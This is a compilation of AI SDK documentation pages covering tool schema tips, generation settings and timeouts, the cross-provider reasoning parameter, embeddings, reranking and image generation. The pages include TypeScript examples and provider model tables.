Use semantically meaningful names for your tools, parameters, parameter properties, etc. The more information you pass to the model, the better it can understand what you want.
Add .describe("...") to your Zod schema properties to give the model hints about what a particular property is for.
When the output of a tool might be unclear to the model and there are dependencies between tools, use the description field of a tool to provide information about the output of the tool execution.
You can include example input/outputs of tool calls in your prompt to help the model understand how to use the tools. Keep in mind that the tools work with JSON objects, so the examples should use JSON.

In general, the goal should be to give the model all information it needs in a clear way.

Tool & Structured Data Schemas

The mapping from Zod schemas to LLM inputs (typically JSON schema) is not always straightforward, since the mapping is not one-to-one.

Zod Dates

const result = await generateText({
  model: __MODEL__,
  output: Output.object({
    schema: z.object({
      events: z.array(
        z.object({
          event: z.string(),
          date: z
            .string()
            .date()
            .transform(value => new Date(value)),
        }),
      ),
    }),
  }),
  prompt: 'List 5 important events from the year 2000.',
});

Optional Parameters

When working with tools that have optional parameters, you may encounter compatibility issues with certain providers that use strict schema validation.

For maximum compatibility, optional parameters should use .nullable() instead of .optional():

// This may fail with strict schema validation
const failingTool = tool({
  description: 'Execute a command',
  inputSchema: z.object({
    command: z.string(),
    workdir: z.string().optional(), // This can cause errors
    timeout: z.string().optional(),
  }),
});

// This works with strict schema validation
const workingTool = tool({
  description: 'Execute a command',
  inputSchema: z.object({
    command: z.string(),
    workdir: z.string().nullable(), // Use nullable instead
    timeout: z.string().nullable(),
  }),
});

Temperature Settings

For tool calls and object generation, it's recommended to use temperature: 0 to ensure deterministic and consistent results:

const result = await generateText({
  model: __MODEL__,
  temperature: 0, // Recommended for tool calls
  tools: {
    myTool: tool({
      description: 'Execute a command',
      inputSchema: z.object({
        command: z.string(),
      }),
    }),
  },
  prompt: 'Execute the ls command',
});

Lower temperature values reduce randomness in model outputs, which is particularly important when the model needs to:

Generate structured data with specific formats
Make precise tool calls with correct parameters
Follow strict schemas consistently

Debugging

Inspecting Warnings

const result = await generateText({
  model: __MODEL__,
  prompt: 'Hello, world!',
});

console.log(result.warnings);

HTTP Request Bodies

You can inspect the raw HTTP request bodies for models that expose them, e.g. OpenAI. This allows you to inspect the exact payload that is sent to the model provider in the provider-specific way.

Request bodies are available via the request.body property of the response:

const result = await generateText({
  model: __MODEL__,
  prompt: 'Hello, world!',
});

console.log(result.request.body);

title: Settings description: Learn how to configure the AI SDK.

Settings

Large language models (LLMs) typically provide settings to augment their output.

All AI SDK functions support the following common settings in addition to the model, the prompt, and additional provider-specific settings:

const result = await generateText({
  model: __MODEL__,
  maxOutputTokens: 512,
  temperature: 0.3,
  maxRetries: 5,
  timeout: 10000,
  prompt: 'Invent a new holiday and describe its traditions.',
});

Language Model Call Options

Language model call options (LanguageModelCallOptions) are settings that influence how the language model generates its response — token limits, sampling behavior, penalties, stop sequences, seed, and reasoning. They are forwarded to the underlying model.

`maxOutputTokens`

Maximum number of tokens to generate.

`temperature`

Temperature setting.

The value is passed through to the provider. The range depends on the provider and model. For most providers, 0 means almost deterministic results, and higher values mean more randomness.

It is recommended to set either temperature or topP, but not both.

In AI SDK 5.0, temperature is no longer set to 0 by default.

`topP`

Nucleus sampling.

It is recommended to set either temperature or topP, but not both.

`topK`

Only sample from the top K options for each subsequent token.

Used to remove "long tail" low probability responses. Recommended for advanced use cases only. You usually only need to use temperature.

`presencePenalty`

The presence penalty affects the likelihood of the model to repeat information that is already in the prompt.

The value is passed through to the provider. The range depends on the provider and model. For most providers, 0 means no penalty.

`frequencyPenalty`

The frequency penalty affects the likelihood of the model to repeatedly use the same words or phrases.

The value is passed through to the provider. The range depends on the provider and model. For most providers, 0 means no penalty.

`stopSequences`

The stop sequences to use for stopping the text generation.

If set, the model will stop generating text when one of the stop sequences is generated. Providers may have limits on the number of stop sequences.

`seed`

It is the seed (integer) to use for random sampling. If set and supported by the model, calls will generate deterministic results.

`reasoning`

Controls how much reasoning the model performs before generating a response.

Value	Behavior
`'provider-default'`	Use the provider's default reasoning behavior (default when omitted)
`'none'`	Disable reasoning
`'minimal'`	Bare-minimum reasoning
`'low'`	Fast, concise reasoning
`'medium'`	Balanced reasoning
`'high'`	Thorough reasoning
`'xhigh'`	Maximum reasoning

If you also set reasoning-related options in providerOptions (e.g. openai.reasoningEffort or anthropic.thinking), the provider-specific options take precedence and the top-level reasoning parameter is ignored.

See the reasoning guide for details on per-provider mapping and migration from providerOptions.

Request Options

Request options (RequestOptions) are settings that affect transport, retries, cancellation, and timeouts — not model generation behavior. They control how the SDK communicates with the provider's API.

`maxRetries`

Maximum number of retries. Set to 0 to disable retries. Default: 2.

`abortSignal`

An optional abort signal that can be used to cancel the call.

The abort signal can e.g. be forwarded from a user interface to cancel the call, or to define a timeout using AbortSignal.timeout.

Example: AbortSignal.timeout

const result = await generateText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  abortSignal: AbortSignal.timeout(5000), // 5 seconds
});

`timeout`

An optional timeout in milliseconds. The call will be aborted if it takes longer than the specified duration.

This is a convenience parameter that creates an abort signal internally. It can be used alongside abortSignal - if both are provided, the call will abort when either condition is met.

You can specify the timeout either as a number (milliseconds) or as an object with the following properties:

totalMs: The total timeout for the entire call including all steps.
stepMs: The timeout for each individual step (LLM call). This is useful for multi-step generations where you want to limit the time spent on each step independently.
chunkMs: The timeout between stream chunks (streaming only). The call will abort if no new chunk is received within this duration. This is useful for detecting stalled streams.
toolMs: The default timeout for all tool executions. If a tool takes longer, it aborts and returns a tool-error so the model can respond or retry.
tools: Per-tool timeout overrides using {toolName}Ms keys (e.g. weatherMs, slowApiMs). Takes precedence over toolMs. Tool names are type-checked for autocomplete.

Example: 5 second timeout (number format)

const result = await generateText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  timeout: 5000, // 5 seconds
});

Example: 5 second total timeout (object format)

const result = await generateText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  timeout: { totalMs: 5000 }, // 5 seconds
});

Example: 10 second step timeout

const result = await generateText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  timeout: { stepMs: 10000 }, // 10 seconds per step
});

Example: Combined total and step timeout

const result = await generateText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  timeout: {
    totalMs: 60000, // 60 seconds total
    stepMs: 10000, // 10 seconds per step
  },
});

Example: Per-chunk timeout for streaming (streamText only)

const result = streamText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  timeout: { chunkMs: 5000 }, // abort if no chunk received for 5 seconds
});

Example: Tool execution timeout

const result = await generateText({
  model: __MODEL__,
  tools: { weather: weatherTool, slowApi: slowApiTool },
  timeout: {
    toolMs: 5000, // 5 seconds default for all tools
  },
  prompt: 'What is the weather in San Francisco?',
});

Example: Per-tool timeout overrides

const result = await generateText({
  model: __MODEL__,
  tools: { weather: weatherTool, slowApi: slowApiTool },
  timeout: {
    toolMs: 5000, // default for all tools
    tools: {
      weatherMs: 3000, // 3 seconds for weather tool
      slowApiMs: 10000, // 10 seconds for slow API tool
    },
  },
  prompt: 'What is the weather in San Francisco?',
});

`headers`

Additional HTTP headers to be sent with the request. Only applicable for HTTP-based providers.

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

const result = await generateText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  headers: {
    'Prompt-Id': 'my-prompt-id',
  },
});

title: Reasoning description: Learn how to control reasoning across providers with the top-level reasoning parameter.

Reasoning

Many language models support an internal "reasoning" phase (sometimes also called "thinking") before producing a response. The AI SDK provides a top-level reasoning parameter on generateText and streamText that controls this behavior across providers with a single, portable setting.

Basic Usage

import { generateText } from 'ai';

const { text, reasoning, reasoningText } = await generateText({
  model: 'anthropic/claude-sonnet-4.6,
  reasoning: 'medium',
  prompt: 'How many people will live in the world in 2040?',
});

The reasoning parameter accepts the following values:

Value	Behavior
`'provider-default'`	Use the provider's default reasoning behavior (default when omitted)
`'none'`	Disable reasoning
`'minimal'`	Bare-minimum reasoning
`'low'`	Fast, concise reasoning
`'medium'`	Balanced reasoning
`'high'`	Thorough reasoning
`'xhigh'`	Maximum reasoning

Streaming

The reasoning parameter works the same way with streamText:

import { streamText } from 'ai';

const result = streamText({
  model: 'google/gemini-3-flash-preview',
  reasoning: 'high',
  prompt: 'Explain the Riemann hypothesis in simple terms.',
});

for await (const part of result.fullStream) {
  if (part.type === 'reasoning') {
    process.stdout.write(part.textDelta);
  } else if (part.type === 'text-delta') {
    process.stdout.write(part.textDelta);
  }
}

Precedence Rules

The top-level reasoning parameter and provider-specific providerOptions are never merged. If you set reasoning-related options in providerOptions, they take full precedence and the top-level reasoning parameter is ignored.

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai.responses('gpt-5.4'),
  reasoning: 'low', // ignored because providerOptions.openai.reasoningEffort is set
  providerOptions: {
    openai: {
      reasoningEffort: 'high', // this wins
    },
  },
  prompt: 'Explain quantum entanglement.',
});

This design lets you use the portable reasoning parameter by default and fall back to providerOptions only when you need provider-specific features like exact token budgets.

Provider Support

The reasoning parameter is supported by the following providers: OpenAI, Anthropic, Google, xAI, Groq, DeepSeek, Fireworks, and Amazon Bedrock. Each provider translates the value to its native reasoning API. Some providers support all six levels natively, while others coerce to fewer levels (a warning is emitted when coercion occurs). Some providers use a numeric token budget instead of an enum for reasoning control; in those cases the top-level reasoning value is mapped to a budget calculated as a percentage of the model's maximum output tokens.

Providers that do not support reasoning (e.g. Mistral, Perplexity, Cohere) emit an unsupported warning and ignore the parameter.

Migrating from `providerOptions`

If you currently control reasoning via providerOptions, you can migrate to the top-level reasoning parameter for portability across providers.

Before (Anthropic)

const { text } = await generateText({
  model: anthropic('claude-opus-4.6'),
  providerOptions: {
    anthropic: {
      thinking: { type: 'adaptive', effort: 'high' },
    },
  },
  prompt: 'How many people will live in the world in 2040?',
});

After (Anthropic)

const { text } = await generateText({
  model: anthropic('claude-opus-4.6'),
  reasoning: 'high',
  prompt: 'How many people will live in the world in 2040?',
});

Before (Anthropic with older model)

const { text } = await generateText({
  model: anthropic('claude-sonnet-4-20250514'),
  providerOptions: {
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 12000 },
    },
  },
  prompt: 'How many people will live in the world in 2040?',
});

After (Anthropic with older model)

const { text } = await generateText({
  model: anthropic('claude-sonnet-4-20250514'),
  reasoning: 'medium',
  prompt: 'How many people will live in the world in 2040?',
});

If you need to enforce an exact token budget (e.g. exactly 12000 tokens), keep using providerOptions instead of the top-level reasoning parameter.

Before (Google with `includeThoughts`)

const { text } = await generateText({
  model: google('gemini-3-flash-preview'),
  providerOptions: {
    google: {
      thinkingConfig: { thinkingBudget: 4096, includeThoughts: true },
    },
  },
  prompt: 'Explain the Riemann hypothesis in simple terms.',
});

After (Google with `includeThoughts`)

const { text } = await generateText({
  model: google('gemini-3-flash-preview'),
  reasoning: 'medium',
  providerOptions: {
    google: { thinkingConfig: { includeThoughts: true } },
  },
  prompt: 'Explain the Riemann hypothesis in simple terms.',
});

Before (OpenAI with `reasoningSummary`)

const { text } = await generateText({
  model: openai.responses('o3'),
  providerOptions: {
    openai: { reasoningEffort: 'high', reasoningSummary: 'auto' },
  },
  prompt: 'Explain quantum entanglement.',
});

After (OpenAI with `reasoningSummary`)

const { text } = await generateText({
  model: openai.responses('o3'),
  reasoning: 'high',
  providerOptions: {
    openai: { reasoningSummary: 'auto' },
  },
  prompt: 'Explain quantum entanglement.',
});

Note that providerOptions can still be used alongside reasoning for provider-specific features unrelated to reasoning effort. However, if providerOptions includes reasoning effort/budget settings (e.g. reasoningEffort, thinking, thinkingConfig.thinkingBudget), those take full precedence and the top-level reasoning parameter is ignored.

title: Embeddings description: Learn how to embed values with the AI SDK.

Embeddings

Embedding a Single Value

The AI SDK provides the embed function to embed single values, which is useful for tasks such as finding similar words or phrases or clustering text. You can use it with embeddings models, e.g. openai.embeddingModel('text-embedding-3-large') or mistral.embeddingModel('mistral-embed').

import { embed } from 'ai';

// 'embedding' is a single embedding object (number[])
const { embedding } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'sunny day at the beach',
});

Embedding Many Values

When loading data, e.g. when preparing a data store for retrieval-augmented generation (RAG), it is often useful to embed many values at once (batch embedding).

import { embedMany } from 'ai';

// 'embeddings' is an array of embedding objects (number[][]).
// It is sorted in the same order as the input values.
const { embeddings } = await embedMany({
  model: 'openai/text-embedding-3-small',
  values: [
    'sunny day at the beach',
    'rainy afternoon in the city',
    'snowy night in the mountains',
  ],
});

Embedding Similarity

import { cosineSimilarity, embedMany } from 'ai';

const { embeddings } = await embedMany({
  model: 'openai/text-embedding-3-small',
  values: ['sunny day at the beach', 'rainy afternoon in the city'],
});

console.log(
  `cosine similarity: ${cosineSimilarity(embeddings[0], embeddings[1])}`,
);

Token Usage

Many providers charge based on the number of tokens used to generate embeddings. Both embed and embedMany provide token usage information in the usage property of the result object:

import { embed } from 'ai';

const { embedding, usage } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'sunny day at the beach',
});

console.log(usage); // { tokens: 10 }

Settings

Provider Options

Embedding model settings can be configured using providerOptions for provider-specific parameters:

import { embed } from 'ai';

const { embedding } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'sunny day at the beach',
  providerOptions: {
    openai: {
      dimensions: 512, // Reduce embedding dimensions
    },
  },
});

Parallel Requests

The embedMany function now supports parallel processing with configurable maxParallelCalls to optimize performance:

import { embedMany } from 'ai';

const { embeddings, usage } = await embedMany({
  maxParallelCalls: 2, // Limit parallel requests
  model: 'openai/text-embedding-3-small',
  values: [
    'sunny day at the beach',
    'rainy afternoon in the city',
    'snowy night in the mountains',
  ],
});

Retries

import { embed } from 'ai';

const { embedding } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'sunny day at the beach',
  maxRetries: 0, // Disable retries
});

Abort Signals and Timeouts

Both embed and embedMany accept an optional abortSignal parameter of type AbortSignal that you can use to abort the embedding process or set a timeout.

import { embed } from 'ai';

const { embedding } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'sunny day at the beach',
  abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});

Custom Headers

Both embed and embedMany accept an optional headers parameter of type Record<string, string> that you can use to add custom headers to the embedding request.

import { embed } from 'ai';

const { embedding } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'sunny day at the beach',
  headers: { 'X-Custom-Header': 'custom-value' },
});

Response Information

Both embed and embedMany return response information that includes the raw provider response:

import { embed } from 'ai';

const { embedding, response } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'sunny day at the beach',
});

console.log(response); // Raw provider response

Embedding Middleware

You can enhance embedding models, e.g. to set default values, using wrapEmbeddingModel and EmbeddingModelMiddleware.

Here is an example that uses the built-in defaultEmbeddingSettingsMiddleware:

import {
  defaultEmbeddingSettingsMiddleware,
  embed,
  wrapEmbeddingModel,
  gateway,
} from 'ai';

const embeddingModelWithDefaults = wrapEmbeddingModel({
  model: gateway.embeddingModel('google/gemini-embedding-001'),
  middleware: defaultEmbeddingSettingsMiddleware({
    settings: {
      providerOptions: {
        google: {
          outputDimensionality: 256,
          taskType: 'CLASSIFICATION',
        },
      },
    },
  }),
});

Embedding Providers & Models

Several providers offer embedding models:

Provider	Model	Embedding Dimensions
OpenAI	`text-embedding-3-large`	3072
OpenAI	`text-embedding-3-small`	1536
OpenAI	`text-embedding-ada-002`	1536
Google	`gemini-embedding-001`	3072
Google	`gemini-embedding-2-preview`	3072
Mistral	`mistral-embed`	1024
Cohere	`embed-english-v3.0`	1024
Cohere	`embed-multilingual-v3.0`	1024
Cohere	`embed-english-light-v3.0`	384
Cohere	`embed-multilingual-light-v3.0`	384
Cohere	`embed-english-v2.0`	4096
Cohere	`embed-english-light-v2.0`	1024
Cohere	`embed-multilingual-v2.0`	768
Amazon Bedrock	`amazon.titan-embed-text-v1`	1536
Amazon Bedrock	`amazon.titan-embed-text-v2:0`	1024

title: Reranking description: Learn how to rerank documents with the AI SDK.

Reranking

Reranking Documents

import { rerank } from 'ai';
import { cohere } from '@ai-sdk/cohere';

const documents = [
  'sunny day at the beach',
  'rainy afternoon in the city',
  'snowy night in the mountains',
];

const { ranking } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents,
  query: 'talk about rain',
  topN: 2, // Return top 2 most relevant documents
});

console.log(ranking);
// [
//   { originalIndex: 1, score: 0.9, document: 'rainy afternoon in the city' },
//   { originalIndex: 0, score: 0.3, document: 'sunny day at the beach' }
// ]

Working with Object Documents

Reranking also supports structured documents (JSON objects), making it ideal for searching through databases, emails, or other structured content:

import { rerank } from 'ai';
import { cohere } from '@ai-sdk/cohere';

const documents = [
  {
    from: 'Paul Doe',
    subject: 'Follow-up',
    text: 'We are happy to give you a discount of 20% on your next order.',
  },
  {
    from: 'John McGill',
    subject: 'Missing Info',
    text: 'Sorry, but here is the pricing information from Oracle: $5000/month',
  },
];

const { ranking, rerankedDocuments } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents,
  query: 'Which pricing did we get from Oracle?',
  topN: 1,
});

console.log(rerankedDocuments[0]);
// { from: 'John McGill', subject: 'Missing Info', text: '...' }

Understanding the Results

The rerank function returns a comprehensive result object:

import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';

const { ranking, rerankedDocuments, originalDocuments } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents: ['sunny day at the beach', 'rainy afternoon in the city'],
  query: 'talk about rain',
});

// ranking: sorted array of { originalIndex, score, document }
// rerankedDocuments: documents sorted by relevance (convenience property)
// originalDocuments: original documents array

Each item in the ranking array contains:

originalIndex: Position in the original documents array
score: Relevance score (typically 0-1, where higher is more relevant)
document: The original document

Settings

Top-N Results

Use topN to limit the number of results returned. This is useful for retrieving only the most relevant documents:

import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';

const { ranking } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents: ['doc1', 'doc2', 'doc3', 'doc4', 'doc5'],
  query: 'relevant information',
  topN: 3, // Return only top 3 most relevant documents
});

Provider Options

Reranking model settings can be configured using providerOptions for provider-specific parameters:

import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';

const { ranking } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents: ['sunny day at the beach', 'rainy afternoon in the city'],
  query: 'talk about rain',
  providerOptions: {
    cohere: {
      maxTokensPerDoc: 1000, // Limit tokens per document
    },
  },
});

Retries

import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';

const { ranking } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents: ['sunny day at the beach', 'rainy afternoon in the city'],
  query: 'talk about rain',
  maxRetries: 0, // Disable retries
});

Abort Signals and Timeouts

The rerank function accepts an optional abortSignal parameter of type AbortSignal that you can use to abort the reranking process or set a timeout.

import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';

const { ranking } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents: ['sunny day at the beach', 'rainy afternoon in the city'],
  query: 'talk about rain',
  abortSignal: AbortSignal.timeout(5000), // Abort after 5 seconds
});

Custom Headers

The rerank function accepts an optional headers parameter of type Record<string, string> that you can use to add custom headers to the reranking request.

import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';

const { ranking } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents: ['sunny day at the beach', 'rainy afternoon in the city'],
  query: 'talk about rain',
  headers: { 'X-Custom-Header': 'custom-value' },
});

Response Information

The rerank function returns response information that includes the raw provider response:

import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';

const { ranking, response } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents: ['sunny day at the beach', 'rainy afternoon in the city'],
  query: 'talk about rain',
});

console.log(response); // { id, timestamp, modelId, headers, body }

Reranking Providers & Models

Several providers offer reranking models:

Provider	Model
Cohere	`rerank-v3.5`
Cohere	`rerank-english-v3.0`
Cohere	`rerank-multilingual-v3.0`
Amazon Bedrock	`amazon.rerank-v1:0`
Amazon Bedrock	`cohere.rerank-v3-5:0`
Together.ai	`Salesforce/Llama-Rank-v1`
Together.ai	`mixedbread-ai/Mxbai-Rerank-Large-V2`

title: Image Generation description: Learn how to generate images with the AI SDK.

Image Generation

The AI SDK provides the generateImage function to generate images based on a given prompt using an image model.

import { generateImage } from 'ai';
__PROVIDER_IMPORT__;

const { image } = await generateImage({
  model: __IMAGE_MODEL__,
  prompt: 'Santa Claus driving a Cadillac',
});

You can access the image data using the base64 or uint8Array properties:

const base64 = image.base64; // base64 image data
const uint8Array = image.uint8Array; // Uint8Array image data

Settings

Size and Aspect Ratio

Depending on the model, you can either specify the size or the aspect ratio.

Size

The size is specified as a string in the format {width}x{height}. Models only support a few sizes, and the supported sizes are different for each model and provider.

import { generateImage } from 'ai';
__PROVIDER_IMPORT__;

const { image } = await generateImage({
  model: __IMAGE_MODEL__,
  prompt: 'Santa Claus driving a Cadillac',
  size: '1024x1024',
});

Aspect Ratio

The aspect ratio is specified as a string in the format {width}:{height}. Models only support a few aspect ratios, and the supported aspect ratios are different for each model and provider.

import { generateImage } from 'ai';
__PROVIDER_IMPORT__;

const { image } = await generateImage({
  model: __IMAGE_MODEL__,
  prompt: 'Santa Claus driving a Cadillac',
  aspectRatio: '16:9',
});

Generating Multiple Images

generateImage also supports generating multiple images at once:

import { generateImage } from 'ai';
__PROVIDER_IMPORT__;

const { images } = await generateImage({
  model: __IMAGE_MODEL__,
  prompt: 'Santa Claus driving a Cadillac',
  n: 4, // number of images to generate
});

const { images } = await generateImage({
  model: __IMAGE_MODEL__,
  prompt: 'Santa Claus driving a Cadillac',
  maxImagesPerCall: 5, // Override the default batch size
  n: 10, // Will make 2 calls of 5 images each
});

Providing a Seed

You can provide a seed to the generateImage function to control the output of the image generation process. If supported by the model, the same seed will always produce the same image.

import { generateImage } from 'ai';
__PROVIDER_IMPORT__;

const { image } = await generateImage({
  model: __IMAGE_MODEL__,
  prompt: 'Santa Claus driving a Cadillac',
  seed: 1234567890,
});

Provider-specific Settings

import { generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';

const { image } = await generateImage({
  model: openai.image('dall-e-3'),
  prompt: 'Santa Claus driving a Cadillac',
  size: '1024x1024',
  providerOptions: {
    openai: { style: 'vivid', quality: 'hd' },
  },
});

Abort Signals and Timeouts

generateImage accepts an optional abortSignal parameter of type AbortSignal that you can use to abort the image generation process or set a timeout.

import { generateImage } from 'ai';
__PROVIDER_IMPORT__;

const { image } = await generateImage({
  model: __IMAGE_MODEL__,
  prompt: 'Santa Claus driving a Cadillac',
  abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});

Custom Headers

generateImage accepts an optional headers parameter of type Record<string, string> that you can use to add custom headers to the image generation request.

import { generateImage } from 'ai';
__PROVIDER_IMPORT__;

const { image } = await generateImage({
  model: __IMAGE_MODEL__,
  prompt: 'Santa Claus driving a Cadillac',
  headers: { 'X-Custom-Header': 'custom-value' },
});

Warnings

If the model returns warnings, e.g. for unsupported parameters, they will be available in the warnings property of the response.

const { image, warnings } = await generateImage({
  model: __IMAGE_MODEL__,
  prompt: 'Santa Claus driving a Cadillac',
});

Additional provider-specific meta data

Some providers expose additional meta data for the result overall or per image.

const prompt = 'Santa Claus driving a Cadillac';

const { image, providerMetadata } = await generateImage({
  model: openai.image('dall-e-3'),
  prompt,
});

const revisedPrompt = providerMetadata.openai.images[0]?.revisedPrompt;

console.log({
  prompt,
  revisedPrompt,
});

Error Handling

When generateImage cannot generate a valid image, it throws a AI_NoImageGeneratedError.

This error occurs when the AI provider fails to generate an image. It can arise due to the following reasons:

The model failed to generate a response
The model generated a response that could not be parsed

The error preserves the following information to help you log the issue:

responses: Metadata about the image model responses, including timestamp, model, and headers.
cause: The cause of the error. You can use this for more detailed error handling

import { generateImage, NoImageGeneratedError } from 'ai';

try {
  await generateImage({ model, prompt });
} catch (error) {
  if (NoImageGeneratedError.isInstance(error)) {
    console.log('NoImageGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Responses:', error.responses);
  }
}

Image Middleware

You can enhance image models, e.g. to set default values or implement logging, using wrapImageModel and ImageModelV4Middleware.

Here is an example that sets a default size when none is provided:

import { generateImage, wrapImageModel } from 'ai';
__PROVIDER_IMPORT__;

const model = wrapImageModel({
  model: __IMAGE_MODEL__,
  middleware: {
    specificationVersion: 'v3',
    transformParams: async ({ params }) => ({
      ...params,
      size: params.size ?? '1024x1024',
    }),
  },
});

const { image } = await generateImage({
  model,
  prompt: 'Santa Claus driving a Cadillac',
});

Generating Images with Language Models

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const result = await generateText({
  model: google('gemini-2.5-flash-image'),
  prompt: 'Generate an image of a comic cat',
});

for (const file of result.files) {
  if (file.mediaType.startsWith('image/')) {
    // The file object provides multiple data formats:
    // Access images as base64 string, Uint8Array binary data, or check type
    // - file.base64: string (data URL format)
    // - file.uint8Array: Uint8Array (binary data)
    // - file.mediaType: string (e.g. "image/png")
  }
}

Image Models

Provider	Model	Support sizes (`width x height`) or aspect ratios (`width : height`)
xAI Grok	`grok-imagine-image`	`1:1`, `16:9`, `9:16`, `4:3`, `3:4`, `3:2`, `2:3`, `2:1`, `1:2`, `19.5:9`, `9:19.5`, `20:9`, `9:20`, `auto`
OpenAI	`gpt-image-1`	1024x1024, 1536x1024, 1024x1536
OpenAI	`dall-e-3`	1024x1024, 1792x1024, 1024x1792
OpenAI	`dall-e-2`	256x256, 512x512, 1024x1024
Amazon Bedrock	`amazon.nova-canvas-v1:0`	320-4096 (multiples of 16), 1:4 to 4:1, max 4.2M pixels
Fal	`fal-ai/flux/dev`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/flux-lora`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/fast-sdxl`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/flux-pro/v1.1-ultra`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/ideogram/v2`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/recraft-v3`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/stable-diffusion-3.5-large`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/hyper-sdxl`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
DeepInfra	`stabilityai/sd3.5`	1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21
DeepInfra	`black-forest-labs/FLUX-1.1-pro`	256-1440 (multiples of 32)
DeepInfra	`black-forest-labs/FLUX-1-schnell`	256-1440 (multiples of 32)
DeepInfra	`black-forest-labs/FLUX-1-dev`	256-1440 (multiples of 32)
DeepInfra	`black-forest-labs/FLUX-pro`	256-1440 (multiples of 32)
DeepInfra	`stabilityai/sd3.5-medium`	1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21
DeepInfra	`stabilityai/sdxl-turbo`	1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21
Replicate	`black-forest-labs/flux-schnell`	1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9
Replicate	`recraft-ai/recraft-v3`	1024x1024, 1365x1024, 1024x1365, 1536x1024, 1024x1536, 1820x1024, 1024x1820, 1024x2048, 2048x1024, 1434x1024, 1024x1434, 1024x1280, 1280x1024, 1024x1707, 1707x1024
Google	`imagen-4.0-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Google	`imagen-4.0-fast-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Google	`imagen-4.0-ultra-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Google Vertex	`imagen-4.0-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Google Vertex	`imagen-4.0-fast-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Google Vertex	`imagen-4.0-ultra-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Google Vertex	`imagen-3.0-fast-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Fireworks	`accounts/fireworks/models/flux-1-dev-fp8`	1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9
Fireworks	`accounts/fireworks/models/flux-1-schnell-fp8`	1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9
Fireworks	`accounts/fireworks/models/playground-v2-5-1024px-aesthetic`	640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640
Fireworks	`accounts/fireworks/models/japanese-stable-diffusion-xl`	640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640
Fireworks	`accounts/fireworks/models/playground-v2-1024px-aesthetic`	640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640
Fireworks	`accounts/fireworks/models/SSD-1B`	640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640
Fireworks	`accounts/fireworks/models/stable-diffusion-xl-1024-v1-0`	640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640
Luma	`photon-1`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Luma	`photon-flash-1`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Together.ai	`stabilityai/stable-diffusion-xl-base-1.0`	512x512, 768x768, 1024x1024
